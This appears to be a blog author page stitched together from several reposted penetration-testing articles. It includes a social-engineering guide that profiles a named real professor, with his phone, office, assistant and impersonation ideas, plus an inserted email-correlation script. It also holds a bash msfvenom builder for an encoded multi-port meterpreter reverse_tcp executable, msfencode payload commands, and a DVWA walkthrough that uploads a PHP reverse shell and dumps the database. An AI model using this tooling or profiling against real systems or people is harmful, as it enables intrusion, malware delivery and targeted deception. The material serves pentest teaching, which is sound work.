All posts by amit369

How A Researcher Hacked iKettles to Steal WiFi Passwords All Across London

IoT security is a much-debated topic that needs more attention in the near future. It might seem convenient to connect all your home devices to the internet and control them on the move, but be aware that your favourite home gadget may be spilling your secrets.

For example, take the humble kettle boiling a nice cuppa for you. A security researcher in England has been hacking into smart iKettles all across the country and recovering the owners’ private WiFi passwords.

“If you haven’t configured the kettle, it’s trivially easy for hackers to find your house and take over your kettle,” says Ken Munro, a researcher with Pen Test Partners.

The iKettle is a ‘smart’ kettle that can be switched on from a smartphone app. If it is not configured properly, it is reportedly insecure and exposes the home WiFi password to anyone within radio range.


He says he cracked the home WiFi passwords “easily” and explains the attack: “Attackers will need to set up a malicious network with the same SSID but with a stronger signal that the iKettle connects to before sending a disassociation packet that will cause the device to drop its wireless link.”

So a skilled attacker can sit outside your home with a directional antenna, knock the kettle off its access point and have it join his rogue network instead. The kettle then hands over the WiFi password in plain text. The fix Munro points to is simple: finish configuring the kettle instead of leaving it in its default state.

Munro says the security of Internet of Things devices is “utterly bananas” and that urgent steps are needed.


source: http://fossbytes.com/


Building Profiles for a Social Engineering Attack

The key to a successful social engineering engagement is trust. If you can win someone’s trust easily, you can obtain any information you want. People are suspicious of strangers and are not very open when asked about themselves or their company. However, if you have done your research and the information you give them has valid grounds, you can convince them and win their trust faster. In this article we will see how to build a profile of someone we know nothing about.

Let’s say our client is MIT (Massachusetts Institute of Technology) and we have no information about them. The first step is to discover email addresses and profiles that exist on social media networks. We have two options here: the tool theHarvester or the Metasploit module called search_email_collector.

The email collector module of the Metasploit framework is simple to use. We just set the domain of our target and it automatically searches Bing, Yahoo and Google for valid email addresses.

Our target is MIT, so the domain we set is mit.edu. Below is a sample of our results.

theHarvester, on the other hand, offers more options: besides email addresses, it can also search for profiles on social networks such as Google+ and LinkedIn. The next image shows the command we executed.

Below is a sample of the email addresses theHarvester discovered. We can of course combine these results with those of the Metasploit module.

We can also search for profiles related to mit.edu on professional networks like LinkedIn. We discovered two profiles.

So we have a lot of email addresses and two names. Comparing the results with those of the Metasploit email collector, we identify an address that probably corresponds to the Walter Lewin profile: lewin@mit.edu, shown in the results below.
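The name-to-address matching described above, as an added Python example that is not part of the original article. The harvested addresses and LinkedIn names are constructed sample data (only the lewin@mit.edu / Walter Lewin pair comes from the article), and the address patterns are common corporate conventions assumed for the example rather than taken from the page. Besides matching, it counts which pattern the organisation favours and uses that to predict the address of a person who was not harvested at all.

```python
import re
from collections import Counter

# Constructed sample data standing in for theHarvester / search_email_collector
# output. Only the lewin@mit.edu / Walter Lewin pair comes from the article;
# every other name and address is made up for the example.
HARVESTED_EMAILS = [
    "lewin@mit.edu", "jdoe@mit.edu", "a.smith@mit.edu", "webmaster@mit.edu",
    "mjones@mit.edu", "newsoffice@mit.edu", "rsmith@mit.edu",
]
LINKEDIN_NAMES = ["Walter Lewin", "Jane Doe", "Mary Jones", "Alan Smith"]

# Role mailboxes are worth noting but never map to a person.
GENERIC_LOCALPARTS = {"webmaster", "postmaster", "info", "newsoffice",
                      "admin", "noreply", "no-reply"}


def candidate_localparts(full_name):
    """Local-parts a person's name commonly produces, keyed by pattern label.

    The patterns are common corporate conventions (assumed, not taken from the
    article); a single-word name yields nothing because no pattern applies.
    """
    parts = [p.lower() for p in re.split(r"[\s\-]+", full_name.strip()) if p]
    if len(parts) < 2:
        return {}
    first, last = parts[0], parts[-1]
    return {
        "last": last,
        "first": first,
        "first.last": f"{first}.{last}",
        "flast": f"{first[0]}{last}",
        "f.last": f"{first[0]}.{last}",
        "firstlast": f"{first}{last}",
        "first_last": f"{first}_{last}",
    }


def correlate(emails, names):
    """Match harvested addresses to names through their local-part.

    Returns (matches, unmatched, pattern_counts): matches maps email to
    (name, pattern); unmatched lists personal-looking addresses no known name
    explains (people still to be identified); pattern_counts records how often
    each pattern matched, which reveals the organisation's address format.
    """
    by_localpart = {}
    for name in names:
        for pattern, lp in candidate_localparts(name).items():
            by_localpart.setdefault(lp, (name, pattern))
    matches, unmatched, counts = {}, [], Counter()
    for email in emails:
        lp = email.split("@", 1)[0].lower()
        if lp in GENERIC_LOCALPARTS:
            continue
        if lp in by_localpart:
            name, pattern = by_localpart[lp]
            matches[email] = (name, pattern)
            counts[pattern] += 1
        else:
            unmatched.append(email)
    return matches, unmatched, counts


def guess_address(full_name, domain, pattern_counts):
    """Predict the address of a person who was not harvested, using the
    dominant pattern seen so far. Returns None when nothing can be inferred."""
    if not pattern_counts:
        return None
    pattern = pattern_counts.most_common(1)[0][0]
    lp = candidate_localparts(full_name).get(pattern)
    return f"{lp}@{domain}" if lp else None


if __name__ == "__main__":
    matches, unmatched, counts = correlate(HARVESTED_EMAILS, LINKEDIN_NAMES)
    for email, (name, pattern) in matches.items():
        print(f"{email:20} -> {name} ({pattern})")
    print("unmatched:", unmatched)
    print("pattern frequency:", dict(counts))
    print("guess for 'Peter Parker':", guess_address("Peter Parker", "mit.edu", counts))
```

The unmatched list is as useful as the matches: an address like rsmith@mit.edu that no LinkedIn name explains is a person still to be identified, and the dominant pattern tells you what the address of any further name you dig up will probably be.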

 

Now that we have a name and an email address it is much easier to search the web for as much information as possible about this particular person. For example, we can start by checking his LinkedIn profile.

We can use the email address lewin@mit.edu to discover his Facebook profile.

The information we can retrieve without being Facebook friends is limited. However, if we pose as an MIT teacher and send a friend request, we may convince him to add us to his friend list, which gives us access to much more personal information. Another good source of information is the website pipl.com.

As you can see, we have discovered his age, his job, his personal web space, his Amazon wish list and a website with a profile of the professor. From the same search we also found his work phone number and his office room.

We can verify these details simply by finding his personal web page at MIT.

From the image above, besides the phone numbers and addresses, we also discovered the professor’s assistant. This helps us in many ways: for example, we can send him an email pretending it comes from his assistant. The professor will think it came from someone he trusts and will answer our questions more readily.

The idea when constructing a profile of the person on whom you will use your social engineering skills is to gather as much information as possible: interests and activities, friends and colleagues, email addresses and phone numbers, and so on. Keeping all of this in your notebook will help you construct a scenario that works.

Conclusion

Exposure of personal information is an advantage for every social engineer. Everything you post on the Internet will eventually stay there forever, so before you post something personal, think twice about whether it is really necessary to let other people know about yourself and your activities. Using different email addresses and usernames also makes a social engineer’s work much harder.

Disclaimer

Pentestlab holds Professor Walter Lewin in high regard, respects his work and contribution to science, and does not in any way encourage its readers to use this personal information to perform illegal activities against him.

SOURCE:


Create Executable Payloads Automatically

This script creates an executable that contains a chain of reverse_tcp stagers, one per port, so the payload tries three different ports in turn; every stage is encoded with the shikata_ga_nai encoder. A handler (exploit/multi/handler) must be listening on each of those ports. By changing the output format the same script can produce other file types such as .vba automatically. The source code of the script is below.

Source Code:

#!/bin/bash
# Simple builder: chains one reverse_tcp stager per port so the resulting
# executable tries each port in turn (EXITFUNC=thread lets the next stager run
# if the previous one fails to connect back). Output: msf.exe in the current
# directory. A handler (exploit/multi/handler) must be listening on each port.
LHOST="192.168.91.135"
LPORTS="4444 5555 6666"
PAYLOAD="windows/meterpreter/reverse_tcp"
ENCODER="x86/shikata_ga_nai"

WORK=$(mktemp -d)
RAW="$WORK/chain.raw"
ADD=""            # becomes "-c $RAW" once a first stager exists

echo "Building..."
set -- $LPORTS    # $1 is the next port to build, $# how many are left
[ "$#" -ge 1 ] || { echo "LPORTS is empty" >&2; exit 1; }

# Every port except the last is emitted as raw shellcode; -c (--add-code)
# prepends the chain built so far, so no port is generated twice.
while [ "$#" -gt 1 ]; do
    echo "Port: $1"
    msfvenom -p "$PAYLOAD" -f raw -e "$ENCODER" LHOST="$LHOST" LPORT="$1" EXITFUNC=thread $ADD > "$WORK/next.raw"
    mv "$WORK/next.raw" "$RAW"
    ADD="-c $RAW"
    shift
done

# The last port becomes the final stager and carries the whole chain.
# Change -f exe to -f vba in order to create a VBA macro instead.
echo "Port: $1"
msfvenom -p "$PAYLOAD" -f exe -e "$ENCODER" LHOST="$LHOST" LPORT="$1" EXITFUNC=thread $ADD > msf.exe

rm -rf "$WORK"
echo "Done!"

Original Author: Michele

First posted here

SOURCE: https://pentestlab.wordpress.com

MSFencode Commands

Note that msfpayload and msfencode were removed from the Metasploit Framework in 2015; msfvenom replaces both, with -e selecting the encoder, -i the number of encoding iterations and -f the output format. The commands below still document the encoding workflow.

msfencode -h

Display the help file of msfencode

msfencode -l

Lists the available encoders

msfencode -t (c, elf, exe, java, js_le, js_be, perl, raw, ruby, vba, vbs, loop-vbs, asp, war, macho)

Format to display the encoded buffer

msfencode -i payload.raw -o encoded_payload.exe -e x86/shikata_ga_nai -c 5 -t exe

Uses the shikata_ga_nai encoder to encode the payload.raw 5 times and exports it to a file called encoded_payload.exe

msfpayload windows/meterpreter/bind_tcp LPORT=443 R | msfencode -e x86/countdown -c 5 -t raw | msfencode -e x86/shikata_ga_nai -c 5 -t exe -o multi-encoded_payload.exe

Creation of a multi-encoded payload

msfencode -i payload.raw BufferRegister=ESI -e x86/alpha_mixed -t c

Creates pure alphanumeric shellcode where ESI points to the shellcode; output in C-style notation

Reference:

From the book Metasploit: The Penetration Tester’s Guide

File Upload Exploitation

File upload vulnerabilities are a major threat to web applications. A penetration tester can use a file upload form to upload files that disclose information about the web server or even return a shell. A shell is always the goal, but a good penetration tester must not stop there: further activities can be performed once the shell is obtained, and they should focus on the database. In this article we will see how to obtain a shell by exploiting a file upload on a Linux web server and how to dump the database running on the system.

BackTrack ships with a variety of web shells for different technologies such as PHP and ASP. In our example we attack the Damn Vulnerable Web Application (DVWA), which is written in PHP, through its file upload form. The web shell we use is php-reverse-shell; before uploading it, edit the $ip and $port variables at the top of the script so that they point to our listener.

Uploading the web shell

Now we set our machine to listen on the port configured in the web shell, using netcat: nc -lvp 4444. The next step is to go back to the web application and browse to the URL where the uploaded PHP reverse shell lives. The web server executes the script and a shell is returned to our console:

Obtaining a shell

We have compromised the remote web server and can run further commands from our shell, such as a simple ls to discover directories.

Listing Directories

Now it is time to dump the database. We move to the directory named uploads, because it is writable and visible to the outside world, which means we can create a file there and later fetch it over HTTP. Then we use the following command to dump the database to a file:

mysqldump -u root -p dvwa > hacked_db.sql

We try the user root because it is MySQL’s default administrative account. It is also very common for the application or company name to be used as the database name, so we try dvwa. The > redirection creates a file named hacked_db.sql inside the uploads directory.

Dumping the database to a file

As the image above shows, we were prompted for a password. In this scenario we simply pressed Enter, that is, an empty password. In a real-world penetration test it would be much harder, but it is always good practice to try some common passwords. The next two images show the dump of the dvwa database.

Dump of DVWA database

Dump of DVWA database 2

The last image shows that we even obtained the admin’s password hash, which can be cracked with a tool such as John the Ripper. This matters because we may also want administrator privileges inside the application itself.

Conclusion 

In this article we saw how to obtain a shell by exploiting the file upload form of an application and how to dump its database. In a real-world scenario restrictions are likely to be in place, but it is good to know the methodology and the steps to follow once we have managed to upload our web shell.

Source: https://pentestlab.wordpress.com